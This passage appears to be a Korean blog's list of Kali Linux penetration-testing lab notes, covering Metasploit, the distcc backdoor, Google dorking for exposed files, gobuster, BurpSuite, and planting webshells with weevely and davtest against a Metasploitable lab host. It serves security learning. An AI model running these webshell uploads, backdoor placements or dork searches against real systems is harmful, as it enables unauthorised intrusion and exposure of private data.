목록Kali Linux (52)
Self-Improvement
*Metasploit (= MSF) 취약점 진단 통합 프레임워크 (GUI) = Armitage (TUI) = msfconsole *msf 실행 (kali) #msfconsole (배너는 매번 다르다) d *msf DB 연결 ※msf는 DB을 연동하여 사용을 할 수 가있다. #msfdb init #cat /usr/share/metasploit-framework/config/database.yml (생성된거 확인) #service postgresql start #service postgresql statusd *MSF 디렉터리 구조 usr/share/metasploit-framework/에서 확인을 한다. *Matasploitable msf을 사용하기 위해 제공되는 취약점이 많이 존재하는 서버이다.d *Ma..
*정의 상대 서버에서 rlogin 서비스가 활성화 중이며 rlogin 서비스는 암호화 없이 일반 텍스트로 데이터가 전송이 되어져 MITM 공격에 취약하며 암호 인증없이 연결이 가능하다. Attacker : kali Victim : metasploitable *실습 (kali) root@kali:~# nmap -sV -p 513 192.168.10.134 rlogin 서비스 확인 root@kali:~# rlogin 192.168.10.134 로그인 성공 (/etc/hosts.equiv, ~/.rhosts의 설정에 의해 암호입력 없이 가능) (metasploitable)
*정의 DistCC는 gcc와 같은 컴파일러 도구로써 나아가 분산작업을 지원하는 도구이다. 즉 클라이언트들에게 작업을 할당하여 컴파일 작업 시간을 줄일 수 있다. 여기선 2.18버전에 대해서 백도어가 설치되어 있어 msfconsole툴을 통해 공격이 가능하다. Attacker : kali Victim : metasploitable *실습 (metasploitable) distcc 버전확인 (kali) root@kali:~# msfconsole -q msf > search distcc distcc 공격 모듈을 검색하고 사용한다. metasploitable ip를 지정한다. metasploitable의 daemon계정으로 연결이 되었다.
https://www.youtube.com/watch?v=kr0Y4iDRkBo&feature=youtu.be https://github.com/RUB-NDS/PRETRUB-NDS/PRETPrinter Exploitation Toolkit - The tool that made dumpster diving obsolete. - RUB-NDS/PRETgithub.comhttps://www.youtube.com/watch?v=RYX2ELCnL-E *프린터가 없어서 실습 못해봄. 단 해당 툴은 되어짐.https://threader.app/thread/1068714506770149376#pewdiepie 전체 프린터 해킹 이 어떻게 진행되었는지는 다음과 같습니다 . 1. Destiny 2를 4 시간 연속 재생 한 ..
GHDB 활용한 정보 수집 https://www.exploit-db.com/google-hacking-database/ 1. 카테고리를 정한다. “Sensitive Directories" 2. 검색할 키워드를 기입한다 “bashrc" 3. 검색된 결과에서 원하는 타입을 선택한다 "intitle:index.of .bashrc" 4. Google Search : intitle:index.of .bashrc을 선택한다 5. 검색된 내용들 중 원하는 사이트을 선택한다. 6. bashrc을 클릭하여 확인을 한다 7. bashrc 파일안의 내용 확인 8. 민감한 데이터 사용하기?
http://kkn1220.tistory.com/102 참고 블로그miranda는 포트토워딩을 해주는 upnp을 설정하게 해주는 툴이다. #miranda upnp> msearh (upnp을 스캔해서 목록을 보여준다. 이때 rootDes.xml이 있는 ip만 가능한것같다 다른건 안해봤음) upnp> host list (검색된 호스트들의 리스트를 보여줌 숫자로 리스트가 나타난다) upnp> host get 숫자 (검색된 호스트의 숫자를 입력하여 저장?한다) upnp> host summary 숫자 (요약해서 보여줌)
#weevely #weevely generate 1234 /root/test/webshell.php weevely을 통해 /root/test폴더에 webshell.php파일을 만든다 webshell.php은php 스크립트 파일이다. webshell.php을 원하는 사이트에 올려서 URL을 확인한다. URL은 http://192.168.35.50/webshell.php #weevely http://192.168.35.50/webshell.php 1234 웹쉘이 작동되면서 www-data 계정으로 접속이 되어진다.
*BurpSuite BurpSuite는 웹 애플리케이션 테스트에 사용되는 툴이며 클라이언트와 서버간의 주고받는 패킷을 확인하여 분석을 하거나 변조하는 등 다양한 목적으로 사용이 되어 진다. Attacker : kali Victim : metasploitable *실습 (kali) #burpsuite & burpsuite툴을 실행을 시키며 Proxy설정을 위해 Options로 가서 확인을 한다. 다음엔 firefox을 실행하며 Proxy설정을 진행한다. #firefox & Preference에 들어가서 Advanced의 Network에서 Settings...을 눌른다. Proxy에 대한 설정을 burpsuite에서 설정한 값으로 입력을 한다. 다음 burpsuite의 Proxy의 intercept을 off..
*gobuster WebServer의 디렉터리나 파일들을 스캔을 할 수 있으며 해당 사이트의 DNS 부속 서버도 스캔 할 수 있는 툴 Attacker : kali Victim : Linux *디렉터리 모드 실습 (kali) #gobuster -t 20 -u http://192.168.20.200/ -w /usr/share/wordlists/dirb/common.txt - u : URL을 적는다. - w : 사전파일 적는다. - t : 동시에보낼 스레드 개수 (안적을시 기본 10개) # gobuster -e -u http://192.168.20.200/ -w /usr/share/wordlists/dirb/common.txt - e : URL전체경로를 보여준다 #gobuster -l -u http://192..
*davtest DAVTest는 테스트 실행 파일을 업로드 한 다음 명령 실행이나 다른 작업을 대상에서 직접 수행 할 수 있도록 파일을 업로드하여 WebDAV 지원 서버를 테스트 하는 툴 Attacker : kali Victim : metasploitable *실습 (kali) #davtest -url http://172.16.6.251/dav -sendbd auto (meta서버의 webdav에 백도어파일을 생성) 명령어가 성공적으로 되었으며 파일들과 맨아래의 Shell인 php파일이 만들어 졌다. 브라우저로 확인을 해본다. #firefox 172.16.6.251/dav & 맨위의 파일이 전에 봤던 쉘이다. 먼저 맨위의 backdoor.php파일을 눌러보고 명령어를 실행을 해본다. 결과로는 아래의 사진..